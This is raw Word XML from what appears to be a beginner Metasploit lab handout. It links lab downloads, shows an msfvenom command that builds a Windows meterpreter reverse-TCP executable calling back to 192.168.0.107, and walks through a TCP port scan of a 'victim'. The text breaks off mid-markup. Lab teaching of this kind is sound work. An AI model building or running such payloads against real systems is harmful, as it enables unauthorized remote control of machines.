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4B4" w:rsidRDefault="007074B4" w:rsidP="007074B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Link to download metasploitable </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007074B4" w:rsidRDefault="007074B4" w:rsidP="007074B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007074B4" w:rsidRDefault="007074B4" w:rsidP="007074B4">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Links: VMware: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
          </w:rPr>
          <w:t>https://www.vmware.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style-scope"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="030303"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007074B4" w:rsidRDefault="007074B4" w:rsidP="007074B4">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style-scope"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="030303"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A35686">
        <w:t>https://www.virtualbox.org/wiki/Downloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007074B4" w:rsidRDefault="007074B4" w:rsidP="007074B4">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 Kali Linux: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
          </w:rPr>
          <w:t>https://www.kali.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style-scope"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="030303"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007074B4" w:rsidRDefault="007074B4" w:rsidP="007074B4">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Parrot OS: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
          </w:rPr>
          <w:t>https://www.parrotsec.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style-scope"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="030303"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007074B4" w:rsidRDefault="007074B4" w:rsidP="007074B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style-scope"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="030303"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00E4193B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://sourceforge.net/projects/metasploitable/files/Metasploitable2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007074B4" w:rsidRDefault="007074B4" w:rsidP="007074B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">video - </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00E4193B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=s4-N2sfmJe8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007074B4" w:rsidRDefault="00456CD5" w:rsidP="007074B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="007074B4" w:rsidRPr="00E4193B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=ShOb8bQ_h_I</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007074B4" w:rsidRDefault="007074B4"/>
    <w:p w:rsidR="002F47F7" w:rsidRPr="00A62D84" w:rsidRDefault="002F47F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62D84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F47F7" w:rsidRDefault="00613C3E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Watch this video : </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="002F47F7" w:rsidRPr="00117CCB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=WNKr2TgJsGc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002A7E24" w:rsidRDefault="002A7E24">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A7E24" w:rsidRDefault="002A7E24">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7E24">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Step by Step Guide : </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:anchor="step-1-generate-the-executable-payload" w:history="1">
        <w:r w:rsidRPr="002A7E24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#step-1-generate-the-executable-payload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002A7E24" w:rsidRDefault="002A7E24"/>
    <w:p w:rsidR="00A62D84" w:rsidRDefault="00A62D84" w:rsidP="00A62D84">
      <w:r>
        <w:t>The payload we are going to create with msfvenom is a Reverse TCP payload for windows. This payload generates an exe which when run connects from the victim’s machine to our Metasploit handler giving us a meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED19AA" w:rsidRPr="00613C3E" w:rsidRDefault="00117CCB" w:rsidP="00A62D84">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00613C3E">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">On KALI </w:t>
      </w:r>
      <w:r w:rsidR="00613C3E">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Do the followings</w:t>
      </w:r>
      <w:r w:rsidRPr="00613C3E">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA0C78" w:rsidRDefault="00BA0C78" w:rsidP="00A62D84">
      <w:r w:rsidRPr="00BA0C78">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>susdo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A62D84" w:rsidRDefault="00394D49" w:rsidP="00A62D84">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“m</w:t>
      </w:r>
      <w:r w:rsidR="00E41315" w:rsidRPr="00740211">
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sfvenom –</w:t>
      </w:r>
      <w:r w:rsidR="007B395D" w:rsidRPr="00740211">
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">l </w:t>
      </w:r>
      <w:r w:rsidR="00B15227" w:rsidRPr="00740211">
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B15227" w:rsidRPr="00117CCB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B395D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    This will </w:t>
      </w:r>
      <w:r w:rsidR="00740211">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00B15227" w:rsidRPr="00117CCB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">ist all payloads </w:t>
      </w:r>
      <w:r w:rsidR="00CB2D0F" w:rsidRPr="00117CCB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>available</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A62D84" w:rsidRDefault="00A62D84" w:rsidP="00A62D84">
      <w:r w:rsidRPr="00117CCB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp lh</w:t>
      </w:r>
      <w:r w:rsidR="00691EFB" w:rsidRPr="00117CCB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">ost=192.168.0.107 lport=6001 –f exe </w:t>
      </w:r>
      <w:r w:rsidR="003D6A49" w:rsidRPr="00117CCB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00117CCB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>securitytutorials.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9357C" w:rsidRDefault="00E9357C" w:rsidP="00A62D84">
      <w:r w:rsidRPr="00E9357C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Do above. It will create a payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6F36" w:rsidRDefault="00EB6F36" w:rsidP="00A62D84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MSFvenom is used </w:t>
      </w:r>
      <w:r w:rsidR="007B395D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>generate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> a payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A62D84" w:rsidRDefault="00D34560" w:rsidP="00A62D84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Meterpreter is a security product used for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>penetration testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Part of the Metasploit Project and Framework, it provides enterprise security teams with the knowledge helpful for addressing vulnerabilities in the targeted application against which Meterpreter is deployed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B152AE" w:rsidRDefault="00B152AE" w:rsidP="00A62D84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00117CCB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The reverse TCP is </w:t>
      </w:r>
      <w:r w:rsidRPr="00117CCB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a type of reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00117CCB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Reverse Shell is more likely to pass through firewalls, as the client/victim will make the connection back to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD13FE" w:rsidRDefault="00FD13FE" w:rsidP="00A62D84"/>
    <w:p w:rsidR="00A62D84" w:rsidRDefault="00A62D84" w:rsidP="00A62D84">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    -p lets you specify which payload you want to use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A62D84" w:rsidRDefault="00A62D84" w:rsidP="0077780F">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="0077780F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="131313"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidR="0077780F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="131313"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> - The IP address or domain that will be inserted into a </w:t>
      </w:r>
      <w:r w:rsidR="0077780F">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="131313"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>staged</w:t>
      </w:r>
      <w:r w:rsidR="0077780F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="131313"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> payload to connect back on.</w:t>
      </w:r>
      <w:r w:rsidR="0077780F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="131313"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0077780F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="131313"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r w:rsidR="0077780F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="131313"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> - The port that will be inserted into a </w:t>
      </w:r>
      <w:r w:rsidR="0077780F">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="131313"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>staged</w:t>
      </w:r>
      <w:r w:rsidR="0077780F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="131313"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> payload which it will then attempt to connect back on.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    -f this tells Msfvenom what it should create the payload as in this instance we are going for a program executable or EXE. (If you want to know what other formats are available type msfvenom -l format in the terminal.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008867EE" w:rsidRDefault="00A62D84" w:rsidP="00A62D84">
      <w:r>
        <w:t xml:space="preserve">    - this redirects the output of our command to the file name we specify.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD13FE" w:rsidRPr="00FD13FE" w:rsidRDefault="00FD13FE" w:rsidP="00A62D84">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD13FE">
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Complete Day 6 first and then comeback over here. This will hep you to easily understand.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD13FE">
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A22D0" w:rsidRDefault="002A22D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD13FE" w:rsidRDefault="00FD13FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD13FE" w:rsidRDefault="00FD13FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B00FCF" w:rsidRPr="00613C3E" w:rsidRDefault="00B00FCF" w:rsidP="00A62D84">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00613C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Port scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613C3E" w:rsidRDefault="00613C3E" w:rsidP="00A62D84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4B4F58"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00613C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp port scan : </w:t>
      </w:r>
      <w:r w:rsidRPr="00613C3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4B4F58"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613C3E" w:rsidRPr="00613C3E" w:rsidRDefault="00613C3E" w:rsidP="00A62D84">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00613C3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4B4F58"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Steps to tcp port scanning on victim machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00986EE5" w:rsidRDefault="008867EE">
      <w:r w:rsidRPr="00B00FCF">
        <w:t>Open msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00B00FCF">
        <w:t xml:space="preserve">, type </w:t>
      </w:r>
      <w:r w:rsidR="00362F55">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B00FCF" w:rsidRPr="00117CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>search portscan</w:t>
      </w:r>
      <w:r w:rsidR="00362F55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00A35EB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, then it will display following lsit of ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00272350" w:rsidRDefault="00986EE5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7406113D" wp14:editId="5566CA3C">
            <wp:extent cx="5731510" cy="24180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18080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00272350" w:rsidRDefault="00272350">
      <w:r>
        <w:t>Now type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D216E8" w:rsidRDefault="00272350">
      <w:r w:rsidRPr="00FE7E32">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Msf5&gt; use 5 (tcp port from list)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D216E8" w:rsidRDefault="00D216E8">
      <w:r>
        <w:t>Now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E6187C" w:rsidRDefault="00D216E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3844DD7D" wp14:editId="45021AE3">
            <wp:extent cx="5731510" cy="2101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01850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E6187C" w:rsidRDefault="00E6187C">
      <w:r>
        <w:t>Now set remote host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C7" w:rsidRDefault="00E6187C">
      <w:r>
        <w:rPr>
          <w:noProof/>
